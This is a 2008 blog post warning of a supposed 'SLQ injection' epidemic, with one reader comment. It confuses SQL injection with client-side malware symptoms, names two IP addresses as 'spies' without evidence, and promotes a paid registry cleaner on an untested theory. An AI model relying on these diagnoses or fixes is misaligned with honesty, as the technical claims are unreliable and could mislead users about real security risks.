Internet Anthropologist Think Tank: Security Epidemic: SLQ INJECTION

  • Search our BLOG


  • HOME
    Terrorist Names SEARCH:
    Loading

    Thursday, May 22, 2008

    Security Epidemic: SLQ INJECTION




    Security: hyper endemic Epidemic: SLQ INJECTION, RAMPANT ON INTERNET
    THERE IS NO WAY TO KEEP IT OFF YOUR COMPUTER, BUT YOU CAN STOP THEM FROM RUNNING.
    The risks and threat have been under played by the media and security vendors.
    SLQ injection is now
    ENDEMIC...
    MAC's vulnerable also.



    SECURITY WARNING: epidemic
    SLQ INJECTION IS RAMPANT ON THE WWW, EVEN GOOGLE.
    Also many Google search results are infected.
    This program tests the links free...
    ( USE THE GOOGLE LIST )
    HERE


    Surfing security - GetFREEoffers




    This threat is VERY SERIOUS.
    PARADIGM INTEL
    Currently it is profit motivated, but the potential uses for other motivations
    and the lack of prevention and inability of security vendors and Internet hubs to control SLQ
    injection PUTS the entire WWW at risk.
    Data we have collected:
    From Vista OS
    ( it got on to Vista )
    One we have seen tracks the victim to EVERY PAGE THEY VISIT.
    Spies IP: ( MAC )
    66.197.241.55
    67.159.44.24

    SYMPTOMS:
    Also excessive fan running and stopping, over and over.
    Svchost calls dll's ( from unknown souce ) and attempts to run them.
    Excessive, repetitive spikes in CPU usage as it attempts to run evil dll's.
    Vista:
    Related: ljizv8iy, and possibly FFAlert.dll, neither found with MS search of hard drive.
    In logs someone surfing same pages same times as you.

    SEARCH:
    NO hidden processes file or folders found by F-secure's Blacklight. ( smells of a rootkit )
    Ad aware, 2007 and 2008 finds nothing.
    Webroot, anti-spy and virus found nothing.
    McAfee Suite found nothing.


    Gerald
    Internet Anthropologist, ad Magnum

    Update:
    The rough number of SQL injected sites is around 1.5 million pages, in reality the number is much bigger, and there are several ongoing campaigns injecting obfuscated characters making it a bit more time consuming to track down. Who's behind these attacks? Besides the automation courtesy of botnets, the short answer is everyone with a decent SQL injector, and today's SQL injectors have a built-in reconnaissance capabilities, like this one which I assessed in a previous post.

    SOURCE: Dancho Danchev

    This is a threat to the WWW. G
    HOW:

    CYBERWARS's Pearl Harbour

    ( read the whole thing, all the updates. )

    Possible solutions, get control of rundll32.exe, and verify schost.
    Make recommendations in comments please. G

    UPDATE: 3:42 am EST
    The weakest link: NOT A LONG TERM SOLUTION:
    Theory:
    Registry cleaning seems to clear everything up.
    We used Uniblue Reg booster.
    $29.00 search for coupon code, $19.00
    It works, but we have been running Haute Secure.
    The reason this works might be that the Reg, was making connections to hidden files,
    but the reg cleaner could not see them and deletes the reg connections thinking they are not valid, thereby disabling the attempted infection. Will be doing more testing.
    System seems to settles right down, fan quits running and no more cpu spikes continually.
    Spikes seem to be more normal. 8> THEY COME BACK.
    TURNED OFF GOOGLE ACCELERATOR FIXED PROBLEM OF SPIKES AND RUNDLL32.EXE
    RUNNING EVERY 4 SECONDS.

    Gerald

    .

    Labels: , , , ,

    1 Comments:

    Anonymous Anonymous said...

    use "noscript" firefox plugin and a proxy/SSH/VPN connection + "freeze" your computer.
    stay frosty!
    kind regards

    9:23 PM  

    Post a Comment

    Subscribe to Post Comments [Atom]

    << Home